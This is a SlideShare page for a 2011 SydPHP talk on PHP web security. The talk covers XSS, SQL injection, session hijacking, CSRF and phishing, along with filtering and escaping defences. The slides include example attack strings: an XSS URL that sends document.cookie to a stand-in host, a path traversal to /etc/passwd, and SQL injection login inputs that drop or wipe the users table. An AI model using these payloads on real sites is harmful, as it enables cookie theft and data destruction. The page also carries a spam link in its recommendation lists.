SlideShare a Scribd company logo

SydPHP Security in PHP

Download as PPTX, PDF
Allan Shone
Allan Shone

Security in PHP talk for SydPHP, Thursday 24th February, 2011

Technology
1 of 39
Security and PHP February 2011
Allan Shone Technical Yahoo!, Local Paranoid @Yahoo!7 Been at Yahoo!7 just under 3 years allan.shone@yahoo.com
Website Security February 2011
What is Security? Why is Security important? What can you do about it?
Types of issues XSS SQL Injection Session Hijacking CSRF Phishing
Why XSS? February 2011
Lead to larger problems Used to inject code into your site Bad people ™ can steal user information
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E February 2011
February 2011
http://sydphp.leetbix.com/template.php?load=/etc/passwd%00 http://sydphp.leetbix.com/template.php?load=../some-config.conf%00 February 2011
POST too February 2011
What do I do?! February 2011
Filter Simplest solution: htmlentities() February 2011
SQL what? February 2011
Arbitrary SQL code being executed Bypass login, edit database content Find passwords, hidden information
http://sydphp.leetbix.com/login.php Password: ‘ OR 1=1 -- ‘ ‘ OR 1=1; DROP TABLE users; -- ‘ ‘ OR 1=1; UPDATE TABLE users SET password=‘’ WHERE 1=1; -- ‘ February 2011
Oh no! February 2011
http://xkcd.com/327/ February 2011
escape February 2011
mysql_real_escape_string() addslashes() PDO PDO::quote()
Session hijacking February 2011
Bad for users Bad for data integrity Easy to prevent
Not stand-alone February 2011
Cookies February 2011
Integrity checking February 2011
CSRF? Sugar? February 2011
Cross-site request forgery February 2011
Simple, but un-common February 2011
<imgsrc=“http://othersite.com/changepasswd?new=onlyIKnow” /> <script> a=document.createElement(‘img’);a.src=‘http://badsite../’;document.firstChild.appendChild(a); a.src=‘http://badsite.com/otherpage’; </script> February 2011
Integrity, integrity February 2011
Phishing! February 2011
Same, but different? February 2011
But what can you do February 2011
PHP’s filter functions February 2011
filter_has_var filter_id filter_input_array filter_input filter_list filter_var_array filter_var
No more SuperGlobals February 2011
$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS); echo ”<h3>No results found for ‘{$search}’.</h3>"; echo "<a href='?search=$search&page=2'>Next page</a>"; February 2011
INPUT_GET INPUT_POST INPUT_COOKIE INPUT_SERVER INPUT_ENV February 2011
Twitter Allan Shone - @cerealboy Jared Mooring - @jadzor Filter function filters: http://au2.php.net/manual/en/filter.filters.php February 2011

Recommended

The problem with passwords on the web and what to do about it
The problem with passwords on the web and what to do about itThe problem with passwords on the web and what to do about it
The problem with passwords on the web and what to do about itFrancois Marier
 
obtain additional security
obtain additional security obtain additional security
obtain additional security offbeatnominee633
 
Common hacking practices
Common hacking practicesCommon hacking practices
Common hacking practicesMarian Marinov
 
Cyber Security 101 – A Practical Guide for Small Businesses
Cyber Security 101 – A Practical Guide for Small BusinessesCyber Security 101 – A Practical Guide for Small Businesses
Cyber Security 101 – A Practical Guide for Small BusinessesPECB
 
B-sides Las Vegas - social network security
B-sides Las Vegas - social network securityB-sides Las Vegas - social network security
B-sides Las Vegas - social network securityDamon Cortesi
 
Facebook Password Sniper
Facebook Password SniperFacebook Password Sniper
Facebook Password Snipereagerdemography62
 
Death To Passwords
Death To PasswordsDeath To Passwords
Death To PasswordsDroidConTLV
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Abhinav Sejpal
 

Recommended

The problem with passwords on the web and what to do about it
The problem with passwords on the web and what to do about itThe problem with passwords on the web and what to do about it
The problem with passwords on the web and what to do about itFrancois Marier
 
obtain additional security
obtain additional security obtain additional security
obtain additional security offbeatnominee633
 
Common hacking practices
Common hacking practicesCommon hacking practices
Common hacking practicesMarian Marinov
 
Cyber Security 101 – A Practical Guide for Small Businesses
Cyber Security 101 – A Practical Guide for Small BusinessesCyber Security 101 – A Practical Guide for Small Businesses
Cyber Security 101 – A Practical Guide for Small BusinessesPECB
 
B-sides Las Vegas - social network security
B-sides Las Vegas - social network securityB-sides Las Vegas - social network security
B-sides Las Vegas - social network securityDamon Cortesi
 
Facebook Password Sniper
Facebook Password SniperFacebook Password Sniper
Facebook Password Snipereagerdemography62
 
Death To Passwords
Death To PasswordsDeath To Passwords
Death To PasswordsDroidConTLV
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Abhinav Sejpal
 
Death To Passwords Droid Edition
Death To Passwords Droid EditionDeath To Passwords Droid Edition
Death To Passwords Droid EditionPayPal
 
Death To Passwords
Death To PasswordsDeath To Passwords
Death To PasswordsTim Messerschmidt
 
JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]Catarina Cardoso
 
Preparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie ApocalypsePreparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie ApocalypsePantheon
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Abhinav Sejpal
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.n|u - The Open Security Community
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)Nitroxis Sprl
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilitiesebusinessmantra
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Nitroxis Sprl
 
Cybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after allCybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after allSophos Benelux
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Jeremiah Grossman
 
Hacking 101 3
Hacking 101 3Hacking 101 3
Hacking 101 3Nitroxis Sprl
 
Secure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna EditionSecure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna EditionAnna Völkl
 
Delete fb downloader search
Delete fb downloader searchDelete fb downloader search
Delete fb downloader searchchristaldisouza1
 
Secure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHPSecure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHPAnna Völkl
 
CSS3 and jQuery
CSS3 and jQueryCSS3 and jQuery
CSS3 and jQuerypsophy
 
jQuery: Events, Animation, Ajax
jQuery: Events, Animation, AjaxjQuery: Events, Animation, Ajax
jQuery: Events, Animation, AjaxConstantin Titarenko
 
PHP Security Tips
PHP Security TipsPHP Security Tips
PHP Security TipsChris Tankersley
 
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Chris Tankersley
 
HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery ValidationHTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validationpauljadam
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 

More Related Content

What's hot

Death To Passwords Droid Edition
Death To Passwords Droid EditionDeath To Passwords Droid Edition
Death To Passwords Droid EditionPayPal
 
JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]Catarina Cardoso
 
Preparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie ApocalypsePreparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie ApocalypsePantheon
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Abhinav Sejpal
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)Nitroxis Sprl
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilitiesebusinessmantra
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Nitroxis Sprl
 
Cybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after allCybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after allSophos Benelux
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Jeremiah Grossman
 
Secure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna EditionSecure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna EditionAnna Völkl
 
Delete fb downloader search
Delete fb downloader searchDelete fb downloader search
Delete fb downloader searchchristaldisouza1
 
Secure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHPSecure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHPAnna Völkl
 

What's hot (16)

Death To Passwords Droid Edition
Death To Passwords Droid EditionDeath To Passwords Droid Edition
Death To Passwords Droid Edition
 
Death To Passwords
Death To PasswordsDeath To Passwords
Death To Passwords
 
JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]
 
Preparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie ApocalypsePreparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie Apocalypse
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilities
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
 
Cybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after allCybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after all
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
 
Hacking 101 3
Hacking 101 3Hacking 101 3
Hacking 101 3
 
Secure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna EditionSecure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna Edition
 
Delete fb downloader search
Delete fb downloader searchDelete fb downloader search
Delete fb downloader search
 
Secure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHPSecure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHP
 

Viewers also liked

CSS3 and jQuery
CSS3 and jQueryCSS3 and jQuery
CSS3 and jQuerypsophy
 
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Chris Tankersley
 
HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery ValidationHTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validationpauljadam
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 
Anatomy of Fraud (2010 & 2013)
Anatomy of Fraud (2010 & 2013)Anatomy of Fraud (2010 & 2013)
Anatomy of Fraud (2010 & 2013)Jerry Ocampo
 
jQuery Plugins Intro
jQuery Plugins IntrojQuery Plugins Intro
jQuery Plugins IntroCasey West
 
Safety LAMP: data security & agile languages
Safety LAMP: data security & agile languagesSafety LAMP: data security & agile languages
Safety LAMP: data security & agile languagesPostgreSQL Experts, Inc.
 
LAMP Management with Virtualmin
LAMP Management with VirtualminLAMP Management with Virtualmin
LAMP Management with VirtualminJoe Ferguson
 
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingScalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingInformation Technology
 
Web Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris UriarteWeb Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris Uriartewebhostingguy
 
Effective communication
Effective communicationEffective communication
Effective communicationhussulinux
 
Zero to Hero, a jQuery Primer
Zero to Hero, a jQuery PrimerZero to Hero, a jQuery Primer
Zero to Hero, a jQuery PrimerMatthew Buchanan
 
Quick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with VagrantQuick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with VagrantJoe Ferguson
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxGiuseppe Paterno'
 

Viewers also liked (20)

CSS3 and jQuery
CSS3 and jQueryCSS3 and jQuery
CSS3 and jQuery
 
jQuery: Events, Animation, Ajax
jQuery: Events, Animation, AjaxjQuery: Events, Animation, Ajax
jQuery: Events, Animation, Ajax
 
PHP Security Tips
PHP Security TipsPHP Security Tips
PHP Security Tips
 
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
 
HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery ValidationHTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validation
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
 
Anatomy of Fraud (2010 & 2013)
Anatomy of Fraud (2010 & 2013)Anatomy of Fraud (2010 & 2013)
Anatomy of Fraud (2010 & 2013)
 
Cinematic UX Design
Cinematic UX DesignCinematic UX Design
Cinematic UX Design
 
jQuery Plugins Intro
jQuery Plugins IntrojQuery Plugins Intro
jQuery Plugins Intro
 
Cross platform php
Cross platform phpCross platform php
Cross platform php
 
Safety LAMP: data security & agile languages
Safety LAMP: data security & agile languagesSafety LAMP: data security & agile languages
Safety LAMP: data security & agile languages
 
LAMP Management with Virtualmin
LAMP Management with VirtualminLAMP Management with Virtualmin
LAMP Management with Virtualmin
 
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingScalable Internet Servers and Load Balancing
Scalable Internet Servers and Load Balancing
 
Web Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris UriarteWeb Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris Uriarte
 
Effective communication
Effective communicationEffective communication
Effective communication
 
Zero to Hero, a jQuery Primer
Zero to Hero, a jQuery PrimerZero to Hero, a jQuery Primer
Zero to Hero, a jQuery Primer
 
Quick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with VagrantQuick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with Vagrant
 
Apache Web Server Setup 2
Apache Web Server Setup 2Apache Web Server Setup 2
Apache Web Server Setup 2
 
Using unicode with php
Using unicode with phpUsing unicode with php
Using unicode with php
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
 

Similar to SydPHP Security in PHP

Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkErlend Oftedal
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introductiongbud7
 
CodeIgniter i18n Security Flaw
CodeIgniter i18n Security FlawCodeIgniter i18n Security Flaw
CodeIgniter i18n Security FlawAbbas Naderi
 
Top 7 Skills PHP Developer Must Have
Top 7 Skills PHP Developer Must HaveTop 7 Skills PHP Developer Must Have
Top 7 Skills PHP Developer Must HaveIndumathySK
 
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpMitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpJoann Davis
 
Getting More Traffic From Search Advanced Seo For Developers Presentation
Getting More Traffic From Search Advanced Seo For Developers PresentationGetting More Traffic From Search Advanced Seo For Developers Presentation
Getting More Traffic From Search Advanced Seo For Developers PresentationSeo Indonesia
 
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...ufpb
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsCreating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsRicardo Varela
 
Web API Security
Web API SecurityWeb API Security
Web API SecurityStefaan
 
Worry Free Web Development
Worry Free Web DevelopmentWorry Free Web Development
Worry Free Web DevelopmentAra Pehlivanian
 

Similar to SydPHP Security in PHP (20)

Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Building Web Hack Interfaces
Building Web Hack InterfacesBuilding Web Hack Interfaces
Building Web Hack Interfaces
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
CodeIgniter i18n Security Flaw
CodeIgniter i18n Security FlawCodeIgniter i18n Security Flaw
CodeIgniter i18n Security Flaw
 
Security Tech Talk
Security Tech TalkSecurity Tech Talk
Security Tech Talk
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Top 7 Skills PHP Developer Must Have
Top 7 Skills PHP Developer Must HaveTop 7 Skills PHP Developer Must Have
Top 7 Skills PHP Developer Must Have
 
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpMitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 Aitp
 
Getting More Traffic From Search Advanced Seo For Developers Presentation
Getting More Traffic From Search Advanced Seo For Developers PresentationGetting More Traffic From Search Advanced Seo For Developers Presentation
Getting More Traffic From Search Advanced Seo For Developers Presentation
 
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsCreating Yahoo Mobile Widgets
Creating Yahoo Mobile Widgets
 
Web API Security
Web API SecurityWeb API Security
Web API Security
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Worry Free Web Development
Worry Free Web DevelopmentWorry Free Web Development
Worry Free Web Development
 

Recently uploaded

"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfngoud9212
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsHyundai Motor Group
 

Recently uploaded (20)

"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
